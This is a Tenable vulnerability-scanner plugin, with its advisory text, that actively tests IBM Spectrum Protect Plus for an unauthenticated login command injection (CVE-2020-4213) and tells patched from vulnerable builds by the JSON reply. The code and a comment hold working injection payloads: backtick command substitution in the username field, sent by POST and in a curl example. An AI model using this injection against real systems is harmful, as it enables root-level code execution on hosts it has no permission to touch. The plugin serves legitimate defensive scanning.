
IBM Spectrum Protect Plus username Command Injection


The IBM Spectrum Protect Plus administrative console running on the remote host is affected by a remote command injection vulnerability due to improper validation of user-supplied data when processing a login HTTP request. An unauthenticated, remote attacker can exploit this, via a specially crafted HTTP request, to execute arbitrary code on the system with root privileges.

Note that the application is reportedly affected by other vulnerabilities; however, this plugin has not tested for those issues.

#
# (C) Tenable Network Security, Inc.
#

include('compat.inc');

if (description)
{
  # Plugin registration: identity, version, and the vulnerability references
  # (CVE-2020-4213 / ZDI-20-270) this check reports against.
  script_id(135852);
  script_version("1.2");
  script_set_attribute(attribute:"plugin_modification_date", value:"2020/04/23");

  script_cve_id("CVE-2020-4213");
  script_xref(name:"ZDI", value:"ZDI-20-270");

  script_name(english:"IBM Spectrum Protect Plus username Command Injection");

  script_set_attribute(attribute:"synopsis", value:
"A web application running on the remote host is affected by a
remote code execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The IBM Spectrum Protect Plus administrative console running on the
remote host is affected by a remote command injection vulnerability
due to improper validation of user-supplied data when processing a
login HTTP request. An unauthenticated, remote attacker can exploit
this, via a specially crafted HTTP request, to execute arbitrary code
on the system with root privileges.

Note that the application is reportedly affected by other
vulnerabilities; however, this plugin has not tested for those issues.");
  script_set_attribute(attribute:"see_also", value:"https://www.ibm.com/support/pages/node/3178863");
  # Remediation is a package-level fix (spp-emi), not a configuration change.
  script_set_attribute(attribute:"solution", value:
"Update the IBM Spectrum Protect Plus RPM package spp-emi to
10.1.5-217 or later. That spp-emi package should be in the IBM
Spectrum Protect Plus 10.1.5 patch1.");
  # CVSSv2 and CVSSv3 base/temporal vectors; the score source is the CVE itself.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2020-4213");

  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");

  script_set_attribute(attribute:"vuln_publication_date", value:"2020/02/21");
  script_set_attribute(attribute:"patch_publication_date", value:"2020/02/21");
  script_set_attribute(attribute:"plugin_publication_date", value:"2020/04/21");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:ibm:spectrum_protect_plus");
  script_end_attributes();

  # ACT_ATTACK: this is an active check. The body below POSTs a login request
  # carrying the injection payload to the target rather than inferring the
  # state from a version string, so it is only run in scan policies that
  # permit attack-category plugins.
  script_category(ACT_ATTACK);
  script_family(english:"General");

  script_copyright(english:"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.");

  # Runs only after the admin console detection plugin has populated the
  # installed_sw key, and only against hosts offering a www service or
  # the default console port 8090.
  script_dependencies("ibm_spp_admin_console_detect.nbin");
  script_require_keys("installed_sw/IBM Spectrum Protect Plus Administrative Console");
  script_require_ports("Services/www", 8090);

  exit(0);
}

include('http.inc');
include('json.inc');
include('webapp_func.inc');

# Active check for CVE-2020-4213. The login endpoint is probed with a
# username containing a shell command substitution; the vulnerable and
# patched builds are told apart by the exceptionDescription string in the
# JSON reply, not by observing the command's output.
app = 'IBM Spectrum Protect Plus Administrative Console';

# Exit if app is not detected on the host.
get_install_count(app_name:app, exit_if_zero:TRUE);

# Exit if app is not detected on this www port.
port = get_service(svc:'www', exit_on_fail:TRUE);
get_single_install(app_name:app, port:port);

url = '/emi/api/login';

# To confirm the vulnerability, use the following CURL command:
#
# curl -ki --tlsv1.2 -d 'ltype=product&username=`id>/tmp/id`&password=bar'
# 'https://<target_host>:8090/emi/api/login/'
#
# and check if /tmp/id is created on the target host.
#
# NOTE(review): on a vulnerable host the `id` in the username field is
# executed server-side (the description says with root privileges), which
# is why the plugin is categorized ACT_ATTACK. The password value is
# arbitrary filler; the check never expects authentication to succeed.
data = 'ltype=product&username=`id`&password=AAAAAAAA';
res = http_send_recv3(
  port            : port,
  method          : 'POST',
  item            : url,
  data            : data,
  content_type    : 'application/x-www-form-urlencoded',
  exit_on_fail    : TRUE
);

# res[0] is the status line, res[2] the body. Anything other than a 200
# is treated as an unexpected response rather than a verdict either way.
if(' 200 ' >!< res[0])
  audit(AUDIT_RESP_BAD, port, 'an HTTP request. Unexpected HTTP response status ' + chomp(res[0]));

if(empty_or_null(res[2]))
  audit(AUDIT_RESP_BAD, port, 'an HTTP request. No HTTP response data');

# json_read() returns a list; json[0] is the parsed object. json[1] being
# null is treated here as "no JSON parsed" -- presumably the parser's
# status element; confirm against json.inc.
json = json_read(res[2]);
if(isnull(json[1]))
  audit(AUDIT_RESP_BAD, port, 'an HTTP request. No JSON data in HTTP response');

# Both patched and vulnerable replies carry an authoutput object with an
# exceptionDescription; its content is the only signal used below.
authoutput = json[0].authoutput;
if(empty_or_null(authoutput))
  audit(AUDIT_RESP_BAD, port, 'an HTTP request. No authoutput in HTTP response');

exception = authoutput.exceptionDescription;
if(empty_or_null(exception))
  audit(AUDIT_RESP_BAD, port, 'an HTTP request. No exceptionDescription in authoutput');

# Patched server uses REST API to perform user login as opposed to
# using the CURL command.
#
# Patched response:
# {"authoutput":{"returnCode":null,"sessionId":null,"exceptionId":null,"exceptionDescription":"org.springframework.web.client.HttpClientErrorException: 401 null","licenseOutput":null}}
if('org.springframework.web.client.HttpClientErrorException' >< exception)
  audit(AUDIT_LISTEN_NOT_VULN, app, port);
#
# Vulnerable response:
# {"authoutput":{"returnCode":"0","sessionId":null,"exceptionId":"XSBAuthenticationException","exceptionDescription":"Login has failed due to incorrect user name or password. Try again.","licenseOutput":null}}
#
# The report attaches the request that was sent and the raw response body
# so the evidence for the verdict is preserved with the finding.
else if ('Login has failed due to incorrect user name' >< exception)
{
  security_report_v4(
    port       : port,
    severity   : SECURITY_HOLE,
    generic    : TRUE,
    request    : make_list(http_last_sent_request()),
    output     : res[2]
  );
}
# Any other exceptionDescription is neither of the two known shapes, so the
# plugin declines to report rather than guess.
else
  audit(AUDIT_RESP_BAD, port, 'an HTTP request. Unexpected exceptionDescription in authoutput');